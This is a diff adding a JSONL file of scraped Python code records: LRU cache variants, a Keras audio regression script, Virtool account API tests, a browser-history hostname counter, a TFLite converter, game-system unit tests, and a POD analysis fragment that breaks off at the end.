diff --git "a/154.jsonl" "b/154.jsonl"
new file mode 100644
--- /dev/null
+++ "b/154.jsonl"
@@ -0,0 +1,673 @@
+{"seq_id":"192094601","text":"#LRU CACHE\n\nimport collections\n\n\"\"\"simplest solution using list and dict\"\"\"\nclass LRUCache(object):\n    \"\"\"\n    The main idea behind this is that you use a dictionary to check if an item exists\n    and a list to keep track of what was least recently used. Pretty simple.\n    \"\"\"\n\n    def __init__(self, capacity):\n        \"\"\"\n        :type capacity: int\n        \"\"\"\n        self.cap = capacity\n        self.order = []\n        self.cache = {}\n\n    def get(self, key):\n        \"\"\"\n        :rtype: int\n        \"\"\"\n        if key in self.cache:\n            self.order.remove(key)\n            self.order.append(key)\n            return self.cache[key]\n        else:\n            return -1\n\n    def put(self, key, value):\n        \"\"\"\n        :type key: int\n        :type value: int\n        :rtype: nothing\n        \"\"\"\n        if key in self.cache:\n            self.order.remove(key)\n        elif len(self.order) == self.cap:\n            self.cache.pop(self.order[0])\n            self.order.pop(0)\n\n        self.order.append(key)\n        self.cache[key] = value\n\n\n\"\"\"another solution using dict and deque\"\"\"\nclass LRUCache(object):\n    def __init__(self, capacity):\n        self.deque = collections.deque([])\n        self.dic = {}\n        self.capacity = capacity\n\n    def get(self, key):\n        if key not in self.dic:\n            return -1\n        self.deque.remove(key)\n        self.deque.append(key)\n        return self.dic[key]\n\n    def set(self, key, value):\n        if key in self.dic:\n            self.deque.remove(key)\n        elif len(self.dic) == self.capacity:\n            v = self.deque.popleft()  # remove the Least Recently Used element\n            self.dic.pop(v)\n        self.deque.append(key)\n        self.dic[key] = value\n\n\n\"\"\"short solution using ordered dict\"\"\"\nclass LRUCache(object):\n    def __init__(self, capacity):\n        self.dic = collections.OrderedDict()\n        self.remain = capacity\n\n    def get(self, key):\n        if key not in self.dic:\n            return -1\n        v = self.dic.pop(key)\n        self.dic[key] = v  # set key as the newest one\n        return v\n\n    def set(self, key, value):\n        if key in self.dic:\n            self.dic.pop(key)\n        else:\n            if self.remain > 0:\n                self.remain -= 1\n            else:  # self.dic is full\n                self.dic.popitem(last=False)\n        self.dic[key] = value\n\n\n\"\"\"\nPython Dict + Double LinkedList\n\"\"\"\nclass LinkedNode:\n    def __init__(self, k, v):\n        self.key = k\n        self.value = v\n        self.prev = None\n        self.next = None\n\nclass LRUCache(object):\n\n    def __init__(self, capacity):\n        self.capacity = capacity\n        self.head = LinkedNode(None, 'head')\n        self.tail = LinkedNode(None, 'tail')\n        self.head.next = self.tail  # tail being most recent\n        self.tail.prev = self.head  # head being oldest\n        self.data = {}\n\n    def deleteNode(self, node):\n        assert(node is not self.head and node is not self.tail)\n        del self.data[node.key]\n        node.prev.next = node.next\n        node.next.prev = node.prev\n        del node\n\n    def get(self, key):\n        if key not in self.data:\n            return -1\n        node = self.data[key]\n        # take the node out\n        node.prev.next = node.next\n        node.next.prev = node.prev\n        # insert into most recent position\n        self.insertNew(node)\n        return node.value\n\n    def put(self, key, value):\n        # remove old value if present\n        if key in self.data:\n            self.deleteNode(self.data[key])\n\n        # create new node\n        newNode = LinkedNode(key, value)\n        self.data[key] = newNode\n\n        # if over limit, delete oldest node\n        if len(self.data) > self.capacity:\n            self.deleteNode(self.head.next)\n\n        self.insertNew(newNode)\n\n    def insertNew(self, newNode):\n        # insert new node into last position\n        last = self.tail.prev\n        last.next = newNode\n        self.tail.prev = newNode\n        newNode.next = self.tail\n        newNode.prev = 
last\n","sub_path":"leetcode/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"310893960","text":"from keras import Sequential\nfrom keras.layers import BatchNormalization, Flatten, Dense, Conv2D, MaxPooling2D, Dropout\nfrom keras.applications.vgg16 import VGG16\nimport eval_util as eval\nimport csv\nimport numpy as np\nfrom os.path import dirname, exists, join\nfrom os import getcwd\n\n# import data\ndata_choice = 1\nsampling_choice = 2\nlabel_choice = 1\ntraining_epoch = 200\nn_features = 100\nn_frames = 100\nsampling_step = 10\n\nif data_choice == 0:\n data_type = \"melspectrogram\"\nelif data_choice == 1:\n data_type = \"mfcc\"\n\nif sampling_choice == 0:\n sampling_method = \"repeat\"\nelif sampling_choice == 1:\n sampling_method = \"padding\"\nelif sampling_choice == 2:\n sampling_method = \"adaptive_sampling\"\n\n# import data\ndataPath = join(dirname(getcwd()), \"Data\", data_type, sampling_method)\nresultPath = join(dirname(getcwd()), \"Result\", \"CNN\")\n\ntrainX = np.load(join(dataPath, \"train_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \".npy\"))\ntrainY = np.load(join(dataPath, \"train_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \"_labels.npy\"))\n\nvalX = np.load(join(dataPath, \"val_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \".npy\"))\nvalY = np.load(join(dataPath, \"val_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \"_labels.npy\"))\n\n# feature scaling\nfor i in range(trainX.shape[0]):\n trainX[i] = (trainX[i] - trainX[i].mean()) / trainX[i].std()\n\nfor i in range(valX.shape[0]):\n valX[i] = (valX[i] - valX[i].mean()) / valX[i].std()\n\n# expand dimension\ntrainX = np.expand_dims(trainX, 3)\nvalX = np.expand_dims(valX, 3)\n\n# concatenate the same trainX data to make it 3-channel\ntrainX = np.concatenate((trainX, trainX, trainX), 3)\nvalX = np.concatenate((valX, valX, valX), 3)\n\n# initialize VGG16 pre-trained model\nvgg16 = VGG16(include_top=False, weights='imagenet', input_shape=(100, 100, 3), pooling=\"avg\")\n\nif label_choice == 0:\n # this is for arousal prediction\n\n # reshape data input\n arousalTrain = trainY[:, 0].reshape(-1, 1)\n arousalVal = valY[:, 0].reshape(-1, 1)\n\n # initialize record\n arousal_record = open(join(resultPath, 'arousal.csv'), 'w')\n writer = csv.writer(arousal_record)\n writer.writerow(['Train_CCC', 'Val_CCC', 'Train_MSE', \"Val_MSE\"])\n\n vgg_features_train = vgg16.predict(trainX)\n vgg_features_val = vgg16.predict(valX)\n\n # create model\n model = Sequential()\n model.add(Dense(64, activation=\"relu\", input_dim=512))\n model.add(Dropout(0.3))\n model.add(Dense(64, activation=\"relu\"))\n model.add(Dropout(0.3))\n model.add(Dense(1, activation=\"relu\"))\n\n model.compile(optimizer=\"adam\", loss=\"mean_squared_error\")\n\n # train the model\n for epoch in range(training_epoch):\n print(\"\\n\", epoch + 1, \" / \", training_epoch)\n\n history = model.fit(vgg_features_train, arousalTrain, batch_size=32, verbose=1,\n validation_data=(vgg_features_val, arousalVal))\n\n train_pred = model.predict(trainX)\n val_pred = model.predict(valX)\n\n train_ccc = eval.ccc(arousalTrain, 
train_pred)[0][0]\n        val_ccc = eval.ccc(arousalVal, val_pred)[0][0]\n\n        # write into record\n        train_loss = history.history['loss'][-1]\n        val_loss = history.history['val_loss'][-1]\n        writer.writerow([train_ccc, val_ccc, train_loss, val_loss])\n\n    arousal_record.close()\n\nelif label_choice == 1:\n    # this is for valence prediction\n\n    # reshape data input\n    valenceTrain = trainY[:, 1].reshape(-1, 1)\n    valenceVal = valY[:, 1].reshape(-1, 1)\n\n    # initialize record\n    valence_record = open(join(resultPath, 'valence.csv'), 'w')\n    writer = csv.writer(valence_record)\n    writer.writerow(['Train_CCC', 'Val_CCC', 'Train_MSE', \"Val_MSE\"])\n\n    vgg_features_train = vgg16.predict(trainX)\n    vgg_features_val = vgg16.predict(valX)\n\n    # create model\n    model = Sequential()\n    model.add(Dense(64, activation=\"relu\", input_dim=512))\n    model.add(Dropout(0.3))\n    model.add(Dense(64, activation=\"relu\"))\n    model.add(Dropout(0.3))\n    model.add(Dense(1, activation=\"relu\"))\n\n    model.compile(optimizer=\"adam\", loss=\"mean_squared_error\")\n\n    # train the model\n    for epoch in range(training_epoch):\n        print(\"\\n\", epoch + 1, \" / \", training_epoch)\n        # fit and predict on the extracted VGG features, as in the arousal branch\n        history = model.fit(vgg_features_train, valenceTrain, batch_size=32, verbose=1,\n                            validation_data=(vgg_features_val, valenceVal))\n\n        train_pred = model.predict(vgg_features_train)\n        val_pred = model.predict(vgg_features_val)\n\n        train_ccc = eval.ccc(valenceTrain, train_pred)[0][0]\n        val_ccc = eval.ccc(valenceVal, val_pred)[0][0]\n\n        # write into record\n        train_loss = history.history['loss'][-1]\n        val_loss = history.history['val_loss'][-1]\n        writer.writerow([train_ccc, val_ccc, train_loss, val_loss])\n\n    valence_record.close()\n\n\n\n","sub_path":"Models/audio_vgg.py","file_name":"audio_vgg.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503978930","text":"import pytest\n\nimport virtool.users.utils\n\n\nasync def test_get(spawn_client, static_time):\n    client = await spawn_client(authorize=True)\n\n    resp = await client.get(\"/api/account\")\n\n    assert resp.status == 200\n\n    assert await resp.json() == {\n        \"groups\": [],\n        \"id\": \"test\",\n        \"administrator\": False,\n        \"identicon\": \"identicon\",\n        \"last_password_change\": static_time.iso,\n        \"permissions\": {p: False for p in virtool.users.utils.PERMISSIONS},\n        \"primary_group\": \"technician\",\n        \"settings\": {\n            \"quick_analyze_workflow\": \"pathoscope_bowtie\",\n            \"show_ids\": True,\n            \"show_versions\": True,\n            \"skip_quick_analyze_dialog\": True\n        }\n    }\n\n\n@pytest.mark.parametrize(\"error\", [\n    None,\n    \"email_error\",\n    \"password_length_error\",\n    \"missing_old_password\",\n    \"credentials_error\"\n])\nasync def test_edit(error, spawn_client, resp_is, static_time):\n    client = await spawn_client(authorize=True)\n\n    client.app[\"settings\"][\"minimum_password_length\"] = 8\n\n    data = {\n        \"email\": \"dev-at-virtool.ca\" if error == \"email_error\" else \"dev@virtool.ca\",\n        \"password\": \"foo\" if error == \"password_length_error\" else \"foo_bar_1\"\n    }\n\n    if error != \"missing_old_password\":\n        data[\"old_password\"] = \"not_right\" if error == \"credentials_error\" else \"hello_world\"\n\n    resp = await client.patch(\"/api/account\", data)\n\n    if error == \"email_error\":\n        await resp_is.invalid_input(resp, {\"dev-at-virtool.ca\": [\"unknown field\"]})\n\n    elif error == \"password_length_error\":\n        await resp_is.invalid_input(resp, {\"dev-at-virtool.ca\": [\"unknown field\"]})\n\n    elif error == \"missing_old_password\":\n        await 
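The audio_vgg.py record scores predictions with eval_util.ccc, which is not included here. Lin's concordance correlation coefficient has a standard closed form, so a plain NumPy version can stand in for it; note the record indexes the result with [0][0], which suggests the project's helper returns a matrix, while this sketch returns a scalar (an assumption on our part):

import numpy as np

def ccc(x, y):
    # Lin's concordance correlation coefficient for two 1-D arrays:
    # 2*cov(x, y) / (var(x) + var(y) + (mean(x) - mean(y))**2)
    x = np.asarray(x, dtype=float).ravel()
    y = np.asarray(y, dtype=float).ravel()
    cov = np.mean((x - x.mean()) * (y - y.mean()))
    return 2 * cov / (x.var() + y.var() + (x.mean() - y.mean()) ** 2)

# perfect agreement gives 1.0; a constant offset pulls the score below 1
a = np.array([0.1, 0.4, 0.8])
assert abs(ccc(a, a) - 1.0) < 1e-12
print(ccc(a, a + 0.2))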
resp_is.invalid_input(resp, {\"password\": [\"field 'old_password' is required\"]})\n\n elif error == \"credentials_error\":\n await resp_is.bad_request(resp, \"Invalid credentials\")\n\n else:\n assert resp.status == 200\n\n assert await resp.json() == {\n \"permissions\": {\n \"cancel_job\": False,\n \"create_ref\": False,\n \"create_sample\": False,\n \"modify_hmm\": False,\n \"modify_subtraction\": False,\n \"remove_file\": False,\n \"remove_job\": False,\n \"upload_file\": False\n },\n \"groups\": [],\n \"identicon\": \"identicon\",\n \"administrator\": False,\n \"last_password_change\": static_time.iso,\n \"primary_group\": \"technician\",\n \"settings\": {\n \"skip_quick_analyze_dialog\": True,\n \"show_ids\": True,\n \"show_versions\": True,\n \"quick_analyze_workflow\": \"pathoscope_bowtie\"\n },\n \"email\": \"dev@virtool.ca\",\n \"id\": \"test\"\n }\n\n\nasync def test_get_settings(spawn_client):\n \"\"\"\n Test that a ``GET /account/settings`` returns the settings for the session user.\n\n \"\"\"\n client = await spawn_client(authorize=True)\n\n resp = await client.get(\"/api/account/settings\")\n\n assert resp.status == 200\n\n assert await resp.json() == {\n \"skip_quick_analyze_dialog\": True,\n \"show_ids\": True,\n \"show_versions\": True,\n \"quick_analyze_workflow\": \"pathoscope_bowtie\"\n }\n\n\n@pytest.mark.parametrize(\"invalid_input\", [False, True])\nasync def test_update_settings(invalid_input, spawn_client, resp_is):\n \"\"\"\n Test that account settings can be updated at ``POST /account/settings`` and that requests to\n ``POST /account/settings`` return 422 for invalid JSON fields.\n\n \"\"\"\n client = await spawn_client(authorize=True)\n\n data = {\n \"show_ids\": False\n }\n\n if invalid_input:\n data = {\n \"foo_bar\": True,\n \"show_ids\": \"yes\"\n }\n\n resp = await client.patch(\"/api/account/settings\", data)\n\n if invalid_input:\n assert await resp_is.invalid_input(resp, {\n \"show_ids\": [\"must be of boolean type\"]\n })\n else:\n assert resp.status == 200\n\n assert await resp.json() == {\n \"skip_quick_analyze_dialog\": True,\n \"show_ids\": False,\n \"show_versions\": True,\n \"quick_analyze_workflow\": \"pathoscope_bowtie\"\n }\n\n\nasync def test_get_api_keys(spawn_client):\n client = await spawn_client(authorize=True)\n\n await client.db.keys.insert_many([\n {\n \"_id\": \"abc123\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"user\": {\n \"id\": \"test\"\n }\n },\n {\n \"_id\": \"xyz321\",\n \"id\": \"baz_1\",\n \"name\": \"Baz\",\n \"user\": {\n \"id\": \"test\"\n }\n }\n ])\n\n resp = await client.get(\"/api/account/keys\")\n\n assert await resp.json() == [\n {\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\"\n },\n {\n \"id\": \"baz_1\",\n \"name\": \"Baz\"\n }\n ]\n\n\nclass TestCreateAPIKey:\n\n @pytest.mark.parametrize(\"has_perm\", [True, False])\n @pytest.mark.parametrize(\"req_perm\", [True, False])\n async def test(self, has_perm, req_perm, mocker, spawn_client, static_time, no_permissions):\n \"\"\"\n Test that creation of an API key functions properly. 
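The virtool tests above drive one test body through several named error cases with pytest.mark.parametrize. The same pattern works without the project's spawn_client/resp_is fixtures; a self-contained toy version (validate_password is invented for illustration):

import pytest

def validate_password(password, minimum_length=8):
    # toy stand-in for the API's password check
    if len(password) < minimum_length:
        raise ValueError("password too short")
    return True

@pytest.mark.parametrize("error", [None, "password_length_error"])
def test_validate_password(error):
    # pick a bad input for the error case, a good one otherwise,
    # mirroring how test_edit above builds its request data
    password = "foo" if error == "password_length_error" else "foo_bar_1"
    if error == "password_length_error":
        with pytest.raises(ValueError):
            validate_password(password)
    else:
        assert validate_password(password)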
Check that different permission inputs work.\n\n \"\"\"\n mocker.patch(\"virtool.account.utils.generate_api_key\", return_value=(\"raw_key\", \"hashed_key\"))\n\n client = await spawn_client(authorize=True)\n\n if has_perm:\n await client.db.users.update_one({\"_id\": \"test\"}, {\n \"$set\": {\n \"permissions\": {\n **no_permissions,\n \"create_sample\": True\n }\n }\n })\n\n body = {\n \"name\": \"Foobar\"\n }\n\n if req_perm:\n body[\"permissions\"] = {\n \"create_sample\": True\n }\n\n resp = await client.post(\"/api/account/keys\", body)\n\n assert resp.status == 201\n\n expected = {\n \"_id\": \"hashed_key\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"created_at\": static_time.datetime,\n \"user\": {\n \"id\": \"test\"\n },\n \"groups\": [],\n \"permissions\": {**no_permissions, \"create_sample\": has_perm and req_perm}\n }\n\n assert await client.db.keys.find_one() == expected\n\n expected.update({\n \"key\": \"raw_key\",\n \"created_at\": static_time.iso\n })\n\n del expected[\"_id\"]\n del expected[\"user\"]\n\n assert await resp.json() == expected\n\n async def test_naming(self, mocker, spawn_client, static_time):\n \"\"\"\n Test that uniqueness is ensured on the ``id`` field.\n\n \"\"\"\n mocker.patch(\"virtool.account.utils.generate_api_key\", return_value=(\"raw_key\", \"hashed_key\"))\n\n client = await spawn_client(authorize=True)\n\n await client.db.keys.insert_one({\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\"\n })\n\n body = {\n \"name\": \"Foobar\"\n }\n\n resp = await client.post(\"/api/account/keys\", body)\n\n assert resp.status == 201\n\n expected = {\n \"_id\": \"hashed_key\",\n \"id\": \"foobar_1\",\n \"name\": \"Foobar\",\n \"created_at\": static_time.datetime,\n \"user\": {\n \"id\": \"test\"\n },\n \"groups\": [],\n \"permissions\": {p: False for p in virtool.users.utils.PERMISSIONS}\n }\n\n assert await client.db.keys.find_one({\"id\": \"foobar_1\"}) == expected\n\n expected.update({\n \"key\": \"raw_key\",\n \"created_at\": static_time.iso\n })\n\n del expected[\"_id\"]\n del expected[\"user\"]\n\n assert await resp.json() == expected\n\n\nclass TestUpdateAPIKey:\n\n @pytest.mark.parametrize(\"has_admin\", [True, False])\n @pytest.mark.parametrize(\"has_perm\", [True, False])\n async def test(self, has_admin, has_perm, spawn_client, static_time):\n client = await spawn_client(authorize=True)\n\n await client.db.users.update_one({\"_id\": \"test\"}, {\n \"$set\": {\n \"administrator\": has_admin,\n \"permissions.create_sample\": True,\n \"permissions.modify_subtraction\": has_perm\n }\n })\n\n expected = {\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"created_at\": static_time.datetime,\n \"user\": {\n \"id\": \"test\"\n },\n \"groups\": [],\n \"permissions\": {p: False for p in virtool.users.utils.PERMISSIONS}\n }\n\n await client.db.keys.insert_one(expected)\n\n resp = await client.patch(\"/api/account/keys/foobar_0\", {\n \"permissions\": {\n \"create_sample\": True,\n \"modify_subtraction\": True\n }\n })\n\n assert resp.status == 200\n\n expected[\"permissions\"].update({\n \"create_sample\": True,\n \"modify_subtraction\": has_admin or has_perm\n })\n\n assert await client.db.keys.find_one() == expected\n\n del expected[\"_id\"]\n del expected[\"user\"]\n\n expected[\"created_at\"] = static_time.iso\n\n assert await resp.json() == expected\n\n async def test_not_found(self, spawn_client, resp_is):\n client = await spawn_client(authorize=True)\n\n resp = await 
client.patch(\"/api/account/keys/foobar_0\", {\n \"permissions\": {\n \"create_sample\": True\n }\n })\n\n assert await resp_is.not_found(resp)\n\n\n@pytest.mark.parametrize(\"error\", [None, \"404\"])\nasync def test_remove_api_key(error, spawn_client, resp_is):\n client = await spawn_client(authorize=True)\n\n if not error:\n await client.db.keys.insert_one({\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"user\": {\n \"id\": \"test\"\n }\n })\n\n resp = await client.delete(\"/api/account/keys/foobar_0\")\n\n if error:\n assert await resp_is.not_found(resp)\n return\n\n assert await resp_is.no_content(resp)\n assert await client.db.keys.count_documents({}) == 0\n\n\nasync def test_remove_all_api_keys(spawn_client, resp_is):\n client = await spawn_client(authorize=True)\n\n await client.db.keys.insert_many([\n {\n \"_id\": \"hello_world\",\n \"id\": \"hello_world_0\",\n \"user\": {\n \"id\": \"test\"\n }\n },\n {\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"user\": {\n \"id\": \"test\"\n }\n },\n {\n \"_id\": \"baz\",\n \"id\": \"baz_0\",\n \"user\": {\n \"id\": \"fred\"\n }\n }\n ])\n\n resp = await client.delete(\"/api/account/keys\")\n\n assert await resp_is.no_content(resp)\n\n assert await client.db.keys.find().to_list(None) == [{\n \"_id\": \"baz\",\n \"id\": \"baz_0\",\n \"user\": {\n \"id\": \"fred\"\n }\n }]\n\n\nasync def test_logout(spawn_client):\n \"\"\"\n Test that calling the logout endpoint results in the current session being removed and the user being logged\n out.\n\n \"\"\"\n client = await spawn_client(authorize=True)\n\n # Make sure the session is authorized\n resp = await client.get(\"/api/account\")\n assert resp.status == 200\n\n # Logout\n resp = await client.get(\"/api/account/logout\")\n assert resp.status == 200\n\n # Make sure that the session is no longer authorized\n resp = await client.get(\"/api/account\")\n assert resp.status == 401\n\n\n@pytest.mark.parametrize(\"method,path\", [\n (\"GET\", \"/api/account\"),\n (\"PATCH\", \"/api/account\"),\n (\"GET\", \"/api/account/settings\"),\n (\"PATCH\", \"/api/account/settings\"),\n (\"PATCH\", \"/api/account/settings\"),\n (\"GET\", \"/api/account/keys\"),\n (\"POST\", \"/api/account/keys\"),\n (\"PATCH\", \"/api/account/keys/foobar\"),\n (\"DELETE\", \"/api/account/keys/foobar\"),\n (\"DELETE\", \"/api/account/keys\")\n])\nasync def test_requires_authorization(method, path, spawn_client):\n \"\"\"\n Test that a requires authorization 401 response is sent when the session is not authenticated.\n\n \"\"\"\n client = await spawn_client()\n\n if method == \"GET\":\n resp = await client.get(path)\n elif method == \"POST\":\n resp = await client.post(path, {})\n elif method == \"PATCH\":\n resp = await client.patch(path, {})\n else:\n resp = await client.delete(path)\n\n assert await resp.json() == {\n \"id\": \"requires_authorization\",\n \"message\": \"Requires authorization\"\n }\n\n assert resp.status == 401\n","sub_path":"tests/account/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":12893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"577828551","text":"hostname_dic = {}\nwith open(\"chrome_history.csv\", encoding=\"utf-8\") as csvfile:\n csv_reader = csv.reader(csvfile)\n birth_header = next(csv_reader)\n for row in csv_reader:\n hostname = parse.urlparse(row[0]).hostname\n hostname_dic[hostname] = hostname_dic.get(hostname, 0) + 1\nsorted(hostname_dic.items(),key = lambda x:x[1],reverse = 
True)\n\n\nc = (\n Pie()\n .add(\n \"\",\n [\n list(z)\n for z in zip(\n list(hostname_dic)[0:10],\n list(hostname_dic.values())[0:10],\n )\n ],\n center=[\"40%\", \"50%\"],\n )\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"历史记录\"),\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"80%\", orient=\"vertical\"),\n )\n .set_series_opts(label_opts=opts.LabelOpts(formatter=\"{b}: {c}\"))\n .render(\"pie_scroll_legend.html\")\n)\n \nprint(hostname_dic)\n","sub_path":"moumoubaimifan/history/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98058848","text":"import tensorflow as tf\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.applications.mobilenet_v2 import MobileNetV2\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nimport numpy as np\nimport imageio\n\n\ndef representative_dataset():\n\n dataset_size = 10\n\n for i in range(dataset_size):\n\n data = imageio.imread(\"sample_images/\" + str(i) + \".jpg\")\n data = np.reshape(data, [1, 384, 576, 3])\n yield [data.astype(np.float32)]\n\n\ndef convert_model():\n\n # Define the input layer of your network and initialize the MobileNetV2 model\n\n input_size = (384, 576, 3)\n\n input_image = layers.Input(shape=input_size)\n input_image_normalized = preprocess_input(input_image)\n\n sample_model = MobileNetV2(input_tensor=input_image_normalized, input_shape=input_size, include_top=False)\n\n for layer in sample_model.layers:\n layer.trainable = False\n\n\n # Define the entire model\n model_dir = 'model/output/'\n\n # Load your pre-trained model\n # model.load_weights(\"path/to/your/saved/model\")\n\n # Export your model to the TFLite format\n converter = tf.lite.TFLiteConverter.from_saved_model(model_dir)\n\n # Be very careful here:\n # \"experimental_new_converter\" is enabled by default in TensorFlow 2.2+. However, using the new MLIR TFLite\n # converter might result in corrupted / incorrect TFLite models for some particular architectures. Therefore, the\n # best option is to perform the conversion using both the new and old converter and check the results in each case:\n converter.experimental_new_converter = False\n converter.experimental_new_quantizer = True\n\n converter.optimizations = [tf.lite.Optimize.DEFAULT]\n converter.representative_dataset = representative_dataset\n converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]\n converter.inference_input_type = tf.uint8\n converter.inference_output_type = tf.uint8\n\n tflite_model = converter.convert()\n open(\"model.tflite\", \"wb\").write(tflite_model)\n\n # -----------------------------------------------------------------------------\n # That's it! 
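The history.py record tallies hostnames by hand with dict.get; collections.Counter expresses the same tally and gives the top N directly. A sketch with made-up sample URLs in place of the CSV column:

import collections
from urllib import parse

# stand-in for the first column of chrome_history.csv
urls = [
    "https://github.com/a",
    "https://github.com/b",
    "https://docs.python.org/3/",
]

# count visits per hostname and take the most frequent entries
counts = collections.Counter(parse.urlparse(u).hostname for u in urls)
print(counts.most_common(2))  # [('github.com', 2), ('docs.python.org', 1)]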
Your model is now saved as model.tflite file\n # You can now try to run it using the PRO mode of the AI Benchmark application:\n # https://play.google.com/store/apps/details?id=org.benchmark.demo\n # More details can be found here (RUNTIME VALIDATION):\n # https://ai-benchmark.com/workshops/mai/2021/#runtime\n # -----------------------------------------------------------------------------\n\n\nconvert_model()\n","sub_path":"CVPR2021_scene_detection/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"119811320","text":"import unittest\n\nfrom braga import Assemblage, World\nfrom braga.examples import duel\n\n\nclass TestEquipmentSystem(unittest.TestCase):\n\n def setUp(self):\n self.world = World()\n self.player = self.world.make_entity(Assemblage([duel.EquipmentBearing]))\n\n self.wand_factory = Assemblage([duel.Equipment], equipment_type='wand')\n self.wand = self.world.make_entity(self.wand_factory)\n\n self.equipment_system = duel.EquipmentSystem(world=self.world, auto_update=True)\n\n def test_player_has_no_equipment(self):\n self.assertFalse(hasattr(self.player, 'wand'))\n\n def test_nonbearer_item_cannot_equip_equipment(self):\n second_wand = self.world.make_entity(self.wand_factory)\n\n with self.assertRaises(ValueError) as e:\n self.equipment_system.equip(self.wand, second_wand)\n\n self.assertEqual(e.exception.message, \"That cannot equip other items\")\n\n def test_player_equips_an_item(self):\n self.equipment_system.equip(self.player, self.wand)\n\n self.assertEqual(self.player.wand, self.wand)\n\n def test_player_cannot_equip_two_items(self):\n \"\"\" In other minigames, you will be allowed to equip an arbitrary number\n of items, but that is not necessary for the duel simulator.\n \"\"\"\n self.equipment_system.equip(self.player, self.wand)\n\n second_wand = self.world.make_entity(self.wand_factory)\n\n with self.assertRaises(ValueError) as e:\n self.equipment_system.equip(self.player, second_wand)\n\n self.assertEqual(e.exception.message, \"You cannot equip that at this time\")\n\n self.assertEqual(self.player.wand, self.wand)\n\n def test_unequipping_an_item(self):\n self.equipment_system.equip(self.player, self.wand)\n self.equipment_system.unequip(self.player, self.wand)\n\n self.assertFalse(hasattr(self.player, 'wand'))\n\n def test_unequipping_and_reequipping_an_item(self):\n self.equipment_system.equip(self.player, self.wand)\n self.equipment_system.unequip(self.player, self.wand)\n\n second_wand = self.world.make_entity(self.wand_factory)\n self.equipment_system.equip(self.player, second_wand)\n\n self.assertEqual(self.player.wand, second_wand)\n\n\nclass TestContainerSystem(unittest.TestCase):\n\n def setUp(self):\n self.world = World()\n bucket_factory = Assemblage(components=[duel.Container])\n self.bucket_one = self.world.make_entity(bucket_factory)\n self.bucket_two = self.world.make_entity(bucket_factory)\n\n self.thing_factory = Assemblage(components=[duel.Moveable])\n self.thing = self.world.make_entity(self.thing_factory, location=self.bucket_one)\n\n self.container_system = duel.ContainerSystem(world=self.world, auto_update=True)\n\n def test_move_item_to_new_inventory(self):\n self.container_system.move(self.thing, self.bucket_two)\n\n self.assertEqual(self.thing.location, self.bucket_two)\n self.assertEqual(self.bucket_two.inventory, set([self.thing]))\n\n def test_cannot_move_immoveable_item(self):\n bookcase = 
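The convert.py record writes model.tflite but never runs it. A quick smoke test with tf.lite.Interpreter, assuming the 384x576x3 uint8 input the converter above configures:

import numpy as np
import tensorflow as tf

# load the exported flatbuffer and allocate its tensors
interpreter = tf.lite.Interpreter(model_path="model.tflite")
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()

# feed a zero image of the model's declared shape and dtype (uint8 here,
# because the converter set inference_input_type to tf.uint8)
dummy = np.zeros(input_details[0]["shape"], dtype=input_details[0]["dtype"])
interpreter.set_tensor(input_details[0]["index"], dummy)
interpreter.invoke()
output = interpreter.get_tensor(output_details[0]["index"])
print(output.shape, output.dtype)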
self.world.make_entity()\n\n with self.assertRaises(ValueError) as e:\n self.container_system.move(bookcase, self.bucket_two)\n\n self.assertEqual(e.exception.message, \"You cannot move this item\")\n self.assertEqual(self.bucket_two.inventory, set([]))\n\n def test_cannot_move_item_to_non_container(self):\n new_thing = self.thing_factory.make()\n with self.assertRaises(ValueError) as e:\n self.container_system.move(self.thing, new_thing)\n\n self.assertEqual(e.exception.message, \"Invalid destination\")\n self.assertEqual(self.thing.location, self.bucket_one)\n","sub_path":"braga/examples/duel/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"56576111","text":"#----------------------------------------------------------------\n# POD r-theta Mode I for all reference fields\n#----------------------------------------------------------------\n\n#Uref.PL.I.f_r , Uref.PL.I.g_theta_x , Uref.PL.I.g_theta_y , Uref.PL.I.Sing_Values = SVD_r_theta(Uref.PL.I.x , Uref.PL.I.y , 'Mode I' , radlong, thetalong)\n\nUref.PL.I.f_r , Uref.PL.I.g_theta_x , Uref.PL.I.g_theta_y = POD_r_theta(Uref.PL.I.x , Uref.PL.I.y , 'Mode I' , radlong, thetalong)\n\nfile2=open(os.path.join( 